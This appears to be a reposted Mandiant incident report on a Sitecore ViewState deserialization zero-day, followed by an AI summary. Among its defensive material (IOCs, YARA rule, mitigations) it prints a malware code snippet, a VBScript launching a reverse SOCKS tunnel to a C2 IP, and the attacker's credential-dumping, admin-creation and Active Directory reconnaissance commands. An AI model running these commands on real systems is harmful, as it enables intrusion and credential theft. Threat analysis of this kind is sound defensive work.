Cloud Blog: ViewState Deserialization Zero-Day Vulnerability in Sitecore Products (CVE-2025-53690)

ViewStateException information:
Exception message: Invalid viewstate.
Client IP: <redacted>
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1;
Trident/5.0) chromeframe/10.0.648.205 Mozilla/5.0
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/121.0.0.0 Safari/537.36
PersistedState: <27760 byte encrypted + base64 encoded payload>
Referer:
Path: /sitecore/blocked.aspx
Mandiant recovered a copy of the server’s machine keys, which were stored in the ASP.NET configuration file web.config. Like many other ViewState deserialization attacks, this particular Sitecore instance used compromised machine keys. Knowledge of these keys enabled the threat actor to craft malicious ViewStates that were accepted by the server by using tools like the public ysoserial.net project. 
Initial Host Reconnaissance
Mandiant decrypted the threat actor’s ViewState payload using the server’s machine keys and found it contained an embedded .NET assembly named Information.dll. This assembly, which Mandiant tracks as WEEPSTEEL, functions as an internal reconnaissance tool and has similarities to the GhostContainer backdoor and an information-gathering payload previously observed in the wild.

About WEEPSTEEL
WEEPSTEEL is a reconnaissance tool designed to gather system, network, and user information. This data is then encrypted and exfiltrated to the attacker by disguising it as a benign __VIEWSTATE response.

The payload is designed to exfiltrate the following system information for reconnaissance:
// Code Snippet from Host Reconnaissance Function
Information.BasicsInfo basicsInfo = new Information.BasicsInfo
{
Directories = new Information.Directories
{
CurrentWebDirectory = HostingEnvironment.MapPath("~/")
},
// Gather system information
OperatingSystemInformation = Information.GetOperatingSystemInformation(),
DiskInformation = Information.GetDiskInformation(),
NetworkAdapterInformation = Information.GetNetworkAdapterInformation(),
Process = Information.GetProcessInformation()
};
// Serialize the ‘basicsInfo’ object into a JSON string
JavaScriptSerializer javaScriptSerializer = new JavaScriptSerializer();
text = javaScriptSerializer.Serialize(basicsInfo);
Code snippet illustrating WEEPSTELL malware collection functionality
WEEPSTEEL appears to borrow some functionality from ExchangeCmdPy.py, a public tool tailored for similar ViewState-related intrusions. This comparison was originally noted in Kaspersky’s write-up on the GhostContainer backdoor. Like ExchangeCmdPy, WEEPSTEEL sends its output through a hidden HTML field masquerading as a legitimate __VIEWSTATE parameter, shown as follows:
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
value="/wEPDwUKLTcyODc4{AES encrypted + base64 encoded output}" />
Subsequent HTTP POST requests to the blocked.aspx endpoint from the threat actor would result in HTTP 200 "OK" responses, which Mandiant assesses would have contained an output in the aforementioned format. As the threat actor continued their hands-on interaction with the server, Mandiant observed repeated HTTP POST requests with successful responses to the blocked.aspx endpoint.
Establish Foothold
Following successful exploitation, the threat actor gained the NETWORK SERVICE privilege, equivalent to the IIS worker process w3wp.exe. This access provided the actor a starting point for further malicious activities.
Config Extraction
The threat actor then exfiltrated critical configuration files by archiving the contents of \inetpub\sitecore\SitecoreCD\Website, a Sitecore Content Delivery (CD) instance’s web root. This directory contained sensitive files, such as the web.config file, that provide sensitive information about the application’s backend and its dependencies, which would help enable post-exploitation activities.
Host Reconnaissance
After obtaining the key server configuration files, the threat actor proceeded to fingerprint the compromised server through host and network reconnaissance, including but not limited to enumerating running processes, services, user accounts, TCP/IP configurations, and active network connections.
whoami
hostname
net user
tasklist
ipconfig /all
tasklist /svc
netstat -ano
nslookup <domain>
net group domain admins
net localgroup administrators
Staging Directory 
The threat actor leveraged public directories such as Music and Video for staging and deploying their tooling. Files written into the Public directory include:

File: C:\Users\Public\Music\7za.exe

Description: command-line executable for the 7-Zip file archiver

SHA-256: 223b873c50380fe9a39f1a22b6abf8d46db506e1c08d08312902f6f3cd1f7ac3

File: C:\Users\Public\Music\lfe.ico

Description: An open-source network tunnel tool with SOCKS v5 server, tracked as EARTHWORM

SHA-256: b3f83721f24f7ee5eb19f24747b7668ff96da7dfd9be947e6e24a688ecc0a52b

About EARTHWORM
EARTHWORM is an open-source tunneler that allows attackers to create a covert channel to and from a victim system over a separate protocol to avoid detection and network filtering, or to enable access to otherwise unreachable systems.
During our investigation, EARTHWORM was executed to initiate a reverse SOCKS proxy connection back to the following command-and-control (C2) server: 

130.33.156[.]194:443

103.235.46[.]102:80.

File: C:\Users\Public\Music\1.vbs

Description: Attack VBScript: Used to execute threat actor commands, its content varies based on the desired actions.

SHA-256: <hash varies>

In one instance where the file 1.vbs was retrieved, it contained a simple VBS code to launch the EARTHWORM.
 
Set shell = CreateObject("WScript.Shell")
shell.CurrentDirectory = "C:\Users\Public\Music"
shell.Run "ufp.exe -s rssocks -d 130.33.156[.]194
-e 443", 1, False

Escalate Privileges
Following initial compromise, the threat actor elevated their access from NETWORK SERVICE privileges to the SYSTEM or ADMINISTRATOR level.
This involved creating local administrator accounts and obtaining access to domain administrator accounts. The threat actor was observed using additional tools to escalate privileges.
Adding Local Administrators

asp$: The threat actor leveraged a privilege escalation tool to create the local administrator account, asp$. The naming convention mimicking an ASP.NET service account with a common suffix $ suggests an attempt to blend in and evade detection.

"C:\Users\Public\Music\helper.exe" "net user asp$ {REDACTED} /add"
"C:\Users\Public\Music\helper.exe" "net localgroup administrators asp$ /add"

sawadmin: At a later stage, the threat actor established a DWAGENT remote session to create a second local administrator account.

net user sawadmin {REDACTED} /add
net localgroup administrators sawadmin /add
Credential Dumping
The threat actor established RDP access to the host using the two newly created accounts and proceeded to dump the SYSTEM and SAM registry hives from both accounts. While redundant, this gave the attacker the information necessary to extract password hashes of local user accounts on the system. The activities associated with each account are as follows:

asp$

reg save HKLM\SYSTEM c:\users\public\system.hive
reg save HKLM\SAM c:\users\public\sam.hive

sawadmin: Prior to dumping the registry hives, the threat actor executed GoToken.exe. Unfortunately, the binary was not available for analysis.

GoToken.exe -h
GoToken.exe -l
GoToken.exe -ah
GoToken.exe -t
reg save HKLM\SYSTEM SYSTEM.hiv
reg save HKLM\SAM SAM.hiv
Maintain Presence
The threat actor maintained persistence through a combination of methods, leveraging both created and compromised administrator credentials for RDP access. Additionally, the threat actor issued commands to maintain long-term access to accounts. This included modifying settings to disable password expiration for administrative accounts of interest:
net user <AdminUser> /passwordchg:no /expires:never
wmic useraccount where name='<AdminUser>’ set PasswordExpires=False
 For redundancy and continued remote access, the DWAGENT tool was also installed.
Remote Desktop Protocol 
The actor used the Remote Desktop Protocol extensively. The traffic was routed through a reverse SOCKS proxy created by EARTHWORM to bypass security controls and obscure their activities. In one  RDP session, the threat actor under the context of the account asp$ downloaded additional attacker tooling, dwagent.exe and main.exe, into C:\Users\asp$\Downloads.

File Path

MD5

Description

C:\Users\asp$\Downloads\dwagent.exe

n/a

DWAgent installer

C:\Users\asp$\Downloads\main.exe

be7e2c6a9a4654b51a16f8b10a2be175

Downloaded from hxxp://130.33.156[.]194/main.exe

Table 1: Files written in the RDP session
Remote Access Tool: DWAGENT
DWAGENT is a legitimate remote access tool that enables remote control over the host. DWAGENT operates as a service with SYSTEM privilege and starts automatically, ensuring elevated and persistence access. During the DWAGENT remote session, the attacker wrote the file GoToken.exe. The commands executed suggest that the tool was used to aid in extracting the registry hives.

File Path

MD5

Description

C:\Users\Public\Music\GoToken.exe

62483e732553c8ba051b792949f3c6d0

Binary executed prior to dumping of SAM/SYSTEM hives.

Table 2: File written in the DWAgent remote session

Internal Reconnaissance
Active Directory Reconnaissance
During a DWAGENT remote session, the threat actor executed commands to identify Domain Controllers within the target network. The actor then accessed the SYSVOL share on these identified DCs to search for cpassword within Group Policy Object (GPO) XML files. This is a well-known technique attackers employ to discover privileged credentials mistakenly stored in a weakly encrypted format within the domain.
nltest /DCLIST:<domain>
nslookup <domain-controller>
findstr /S /l cpassword
\\<domain-controller>\sysvol\dcext.local\policies\*.xml
SHARPHOUND
The threat actor then transitioned to a new RDP session using a legitimate administrator account. From this session, SHARPHOUND , the data collection component for the Active Directory security analysis platform BLOODHOUND, was downloaded via a browser and saved to C:\Users\Public\Music\sh.exe. 
Following the download, the threat actor returned to the DWAGENT remote session and executed sh.exe, performing extensive Active Directory reconnaissance.
sh.exe -c all
Once the reconnaissance concluded, the threat actor switched back to the RDP session (still using the compromised administrator account) to archive the SharpHound output, preparing it for exfiltration.
C:\Program Files\7-Zip\7zFM.exe
"C:\Users\Public\Music\<number>_BloodHound.zip"
Accounts Cleanup
With administrator accounts compromised, the earlier created asp$ and sawadmin accounts were removed, signaling a shift to more stable and covert access methods. 
Move Laterally
The compromised administrator accounts were used to RDP to other hosts. On these systems, the threat actor executed commands to continue their reconnaissance and deploy EARTHWORM. 
On one host, the threat actor logged in via RDP using a compromised admin account. Under the context of this account, the threat actor then continued to perform internal reconnaissance commands such as:
quser
whoami
net user <AdminUser> /domain
nltest /DCLIST:<domain>
nslookup <domain-controller>
Recommendations
Mandiant recommends implementing security best practices in ASP.NET including implementing automated machine key rotation, enabling View State Message Authentication Code (MAC), and encrypting any plaintext secrets within the web.config file. For more details, refer to the following resources:

ASP.NET Core security topics

What not to do in ASP.NET, and what to do instead

Improved ASP.NET view state security and key management

Code injection attacks using publicly disclosed ASP.NET machine keys

For detailed Sitecore remediation instructions, refer to the official Sitecore advisory SC2025-005.
Indicators of compromise
The following indicators of compromise are available in a Google Threat Intelligence (GTI) collection for registered users.
Accounts

Accounts

Description

asp$

Created account

sawadmin

Created account

h496883

Workstation from the source of the RDP connection

File-Based

MD5

SHA-256

Description

117305c6c8222162d7246f842c4bb014

a566cceaf9a66332470a978a234a8a8e2bbdd4d6aa43c2c75c25a80b3b744307

WEEPSTEEL (Information.dll)

a39696e95a34a017be1435db7ff139d5

b3f83721f24f7ee5eb19f24747b7668ff96da7dfd9be947e6e24a688ecc0a52b

EARTHWORM (lfe.ico, ufp.exe, ufp.ico)

f410d88429b93786b224e489c960bf5c

n/a

Helper.ico, helper.exe

<hash varies> 

<hash varies> 

1.vbs

be7e2c6a9a4654b51a16f8b10a2be175

n/a

main.exe

62483e732553c8ba051b792949f3c6d0

n/a

GoToken.exe

63d22ae0568b760b5e3aabb915313e44

61f897ed69646e0509f6802fb2d7c5e88c3e3b93c4ca86942e24d203aa878863

SharpHound 

Network-Based

IP

130.33.156[.]194:443

130.33.156[.]194:8080

103.235.46[.]102:80

Detections
Google Security Operations Enterprise and Enterprise+ customers can leverage the following product threat detections and content updates to help identify and remediate threats. All detections have been automatically delivered to Google Security Operations tenants within the Mandiant Frontline Threats curated detections ruleset. To leverage these updated rules, access Content Hub and search on any of the strings above, then View and Manage each rule you wish to implement or modify.

Earthworm Tunneling Indicators

User Account Created By Web Server Process

Cmd Launching Process From Users Music

Sharphound Recon

User Created With No Password Expiration Execution

Discovery of Privileged Permission Groups by Web Server Process

YARA Rule
rule G_Recon_WEEPSTEEL_1 {
meta:
author = "Mandiant"
strings:
$v_w = "<input type=\"hidden\" name=\"__VIEWSTATE\" id=\"__VIEWSTATE\" value=" wide
$v_a = "<input type=\"hidden\" name=\"__VIEWSTATE\" id=\"__VIEWSTATE\" value="
$v_b64_w = "<input type=\"hidden\" name=\"__VIEWSTATE\" id=\"__VIEWSTATE\" value=" base64wide
$v_b64_a = "<input type=\"hidden\" name=\"__VIEWSTATE\" id=\"__VIEWSTATE\" value=" base64
$s2 = "Services\\Tcpip\\Parameters" wide
$s3 = "GetOperatingSystemInformation"
$s4 = "GetSystemInformation"
$s5 = "GetNetworkAdapterInformation"
$s6 = "GetAllNetworkInterfaces"
$s7 = "GetIPProperties"
$s8 = "GetPhysicalAddress"
$s9 = "GetDomainNameFromRegistry"

$c1 = "Aes" fullword
$c2 = "CreateEncryptor" fullword
$c3 = "System.Security.Cryptography" fullword
$c4 = "ToBase64String" fullword

$guid = "6d5a95da-0ffe-4303-bb2c-39e182335a9f"
condition:
uint16(0) == 0x5a4d and
(
(all of ($c*) and 7 of ($s*)) or
($guid and (any of ($v*)))
)
}
Acknowledgement
We would like to extend our gratitude to the Sitecore team for their support throughout this investigation. Additionally, we are grateful to Tom Bennett and Nino Isakovic for their assistance with the payload analysis. We also appreciate the valuable input and technical review provided by Richmond Liclican and Tatsuhiko Ito.

aside_block
<ListValue: [StructValue([(‘title’, ‘Contact Mandiant’), (‘body’, <wagtail.rich_text.RichText object at 0x3e0263391c70>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

AI Summary and Description: Yes

### Summary:
This investigation by Mandiant highlights a critical vulnerability in Sitecore products stemming from exposed machine keys. The discovery of a ViewState deserialization attack illustrates the potential for serious remote code execution, reinforcing the importance of proper security practices in ASP.NET environments. This report serves as a compelling case study for security professionals, particularly regarding the mitigation of similar vulnerabilities and the necessity of proactive defenses in application security.

### Detailed Description:
**Mandiant’s Investigation of Sitecore Vulnerability**

– **Attack Type**: The investigation identified an ongoing ViewState deserialization attack targeting Sitecore deployments, taking advantage of sample machine keys that were made available in outdated deployment guides.

– **Exploited Vulnerability**: Attackers executed remote code execution by using the compromised ASP.NET machine keys controlled by the ViewState. The vulnerability is tracked as CVE-2025-53690, affecting various versions of Sitecore products.

– **Attack Sequence**:
– Initial access was gained through the exploitation of the vulnerability on an internet-facing Sitecore instance.
– The payload contained malware (WEEPSTEEL) for reconnaissance, indicating the sophistication of the attacker.
– Following the initial access, the attacker demonstrated clear intentions to gather sensitive data through methods including:
– Archiving critical configuration files.
– Performing local and network reconnaissance to identify vulnerabilities in the host system.

– **Utilization of Tools**:
– Malicious tools uploaded included EARTHWORM (for tunneling) and DWAGENT (for remote access).
– The attacker created local administrator accounts for persistence and lateral movement.

– **Privilege Escalation Techniques**:
– The escalation from NETWORK SERVICE to administrator privileges involved creating accounts and accessing other crucial parts of the network.
– The threat actor executed code to gather sensitive registry information (e.g., dumping SYSTEM and SAM hives).

– **Recommendations for Mitigation**:
– Implementing security best practices in ASP.NET, including:
– Automated machine key rotation.
– Enabling View State Message Authentication Code (MAC).
– Encrypting sensitive data within configuration files.

– **Indicators of Compromise**:
– Specific accounts and file hashes associated with the malware and tools used during the attack were documented as indicators for detection in environments potentially affected.

– **Detections and Recommendations**:
– Mandiant also provided new detection rules and tools to enhance monitoring and response capabilities against similar attacks in the future.

This case serves as a cautionary tale for developers and security professionals, underscoring the critical importance of securing application configurations and implementing robust security controls to guard against data breaches and operational disruptions. Such vulnerabilities must be managed proactively to mitigate risks associated with exposure to unauthorized access.